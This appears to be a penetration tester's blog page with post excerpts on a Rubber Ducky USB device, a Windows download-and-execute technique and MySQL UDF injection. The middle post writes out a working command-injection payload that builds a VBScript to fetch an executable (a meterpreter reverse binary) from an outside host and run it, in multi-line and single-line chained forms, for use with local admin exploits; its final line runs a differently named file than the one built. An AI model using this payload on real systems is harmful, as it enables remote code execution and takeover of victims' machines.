Rubber Ducky

Standard

During my recent internal blackbox testing, i got a chance to use the rubber ducky. This device looks like a USB thumb drive, can be concealed inside a standard USB case and it acts like a keyboard. The script written on the SD card is called ducky script which is very easy to understand.

Since there are alot of write ups on the internet about the ducky ill just be posting on of the script i used in my recent pentesting. I hope you may find it useful .

The script is written keeping in mind that not all windows OS are same, and hardware specification are different as well. While using the default scripts at times the system was not able to type complete code, hence you will see many spaces and delays.


Reverse Shell

Continue reading

Download Execute Alternate Method

Standard

During web application pentest performed on a windows box, we are at times able to upload a web shell and execute commands, Aim is to always get administrator privileges.
I stumbled upon this scenario where i wanted to run a meterpreter reverse binary through command execution vulnerability. Since i cannot wget or curl on windows box, i found a way through VBS. This let me download and execute an EXE.

 

echo Dim HTTPGET >> localexploit.vbs
echo Set HTTPGET = CreateObject(“Microsoft.XMLHTTP”) >> localexploit.vbs &&
echo HTTPGET.Open “GET”, “http://192.168.1.10/ring0.exe”, false >> localexploit.vbs
echo HTTPGET.Send >> localexploit.vbs
echo DataBin = HTTPGET.ResponseBody >> localexploit.vbs
echo Const adTypeBinary=1 >> localexploit.vbs
echo Const adSaveCreateOverWrite=2 >> localexploit.vbs
echo Dim SendBinary >> localexploit.vbs
echo Set SendBinary = CreateObject(“ADODB.Stream”) >> localexploit.vbs
echo SendBinary.Type = adTypeBinary >> localexploit.vbs
echo SendBinary.Open >> localexploit.vbs
echo SendBinary.Write DataBin >> localexploit.vbs
echo SendBinary.SaveToFile “ring0.exe”, adSaveCreateOverWrite >> localexploit.vbs
cscript //Nologo /B runexploit.vbs

Please see URL : http://ethicalhacking.ninja/?c2b99165d69a5b52#5HMGn0WjBu8HPL1ow88XPr5V/NsXC6Y2W5QWF51fDWE=

This can be combined with local admin exploits to give full control over the machine. The command can be send in a single line by adding && , Please see the examples below.

 

echo Dim HTTPGET >> localexploit.vbs && echo Set HTTPGET = CreateObject(“Microsoft.XMLHTTP”) >> localexploit.vbs && echo HTTPGET.Open “GET”, “http://192.168.1.10/ring0.exe”, false >> localexploit.vbs && echo HTTPGET.Send >> localexploit.vbs && echo DataBin = HTTPGET.ResponseBody >> localexploit.vbs && echo Const adTypeBinary=1 >> localexploit.vbs && echo Const adSaveCreateOverWrite=2 >> localexploit.vbs && echo Dim SendBinary >> localexploit.vbs && echo Set SendBinary = CreateObject(“ADODB.Stream”) >> localexploit.vbs && echo SendBinary.Type = adTypeBinary >> localexploit.vbs && echo SendBinary.Open >> localexploit.vbs && echo SendBinary.Write DataBin >> localexploit.vbs && echo SendBinary.SaveToFile “ring0.exe”, adSaveCreateOverWrite >> localexploit.vbs && cscript //Nologo /B runexploit.vbs

Please see URL : http://ethicalhacking.ninja/?548d4d15053430fd#gpQnTUo6jeaIl0tcU7vW3GatF0IsJ//oomqHkXwtTB8=

MySQL UDF Injection

Standard

While performing a web application penetration testing, at times you are able to find out the web application is running MySQL database through  “root” credentials. This is one of the biggest NO of security. In this case we can get a root shell on the machine with just a few commands. Here comes my second cheat sheet so that i do not forget this any more.

Web Shell MySQL

Continue reading